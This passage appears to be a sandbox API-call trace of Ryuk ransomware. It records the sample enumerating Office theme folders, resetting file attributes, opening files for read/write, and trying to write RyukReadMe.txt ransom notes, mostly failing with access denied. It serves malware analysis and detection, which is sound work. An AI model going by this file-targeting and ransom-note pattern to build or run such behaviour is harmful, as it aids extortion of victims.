(normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.178] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.178] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.178] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0132.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.225] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.225] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.225] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0132.225] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0132.225] SetLastError (dwErrCode=0x0) [0132.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.225] GetLastError () returned 0x5 [0132.225] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.225] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.225] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.225] SetLastError (dwErrCode=0x0) [0132.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.225] GetLastError () returned 0x5 [0132.225] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.226] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.271] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.271] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM", dwFileAttributes=0x80) returned 0 [0132.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.316] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.316] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.316] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.317] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF", dwFileAttributes=0x80) returned 0 [0132.317] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.317] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.317] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.317] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.317] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.317] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.365] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.365] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.365] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0132.412] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.412] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.412] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.413] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0132.413] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0132.413] SetLastError (dwErrCode=0x0) [0132.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.413] GetLastError () returned 0x5 [0132.413] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.413] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.413] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.413] SetLastError (dwErrCode=0x0) [0132.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.413] GetLastError () returned 0x5 [0132.413] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.413] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.414] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.458] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.458] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.458] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.458] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM", dwFileAttributes=0x80) returned 0 [0132.458] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.459] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.459] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.459] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.459] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.459] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF", dwFileAttributes=0x80) returned 0 [0132.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.506] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.506] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.506] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.506] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0132.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.507] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.507] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0132.507] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0132.507] SetLastError (dwErrCode=0x0) [0132.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.507] GetLastError () returned 0x5 [0132.507] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.507] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.507] SetLastError (dwErrCode=0x0) [0132.507] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.507] GetLastError () returned 0x5 [0132.507] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.508] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.550] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.550] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.550] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.550] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM", dwFileAttributes=0x80) returned 0 [0132.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.551] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.551] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.551] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF", dwFileAttributes=0x80) returned 0 [0132.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.599] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.599] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.659] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.659] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.659] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.659] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0132.659] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.659] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.660] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0132.660] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0132.660] SetLastError (dwErrCode=0x0) [0132.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.660] GetLastError () returned 0x5 [0132.660] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.660] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.660] SetLastError (dwErrCode=0x0) [0132.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.660] GetLastError () returned 0x5 [0132.660] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.660] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.660] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.660] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM", dwFileAttributes=0x80) returned 0 [0132.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.661] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.661] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF", dwFileAttributes=0x80) returned 0 [0132.661] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.661] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.661] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.662] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.662] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.662] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.662] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0132.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.663] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.663] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0132.663] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0132.663] SetLastError (dwErrCode=0x0) [0132.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.663] GetLastError () returned 0x5 [0132.663] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.663] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.663] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.663] SetLastError (dwErrCode=0x0) [0132.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.663] GetLastError () returned 0x5 [0132.663] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: 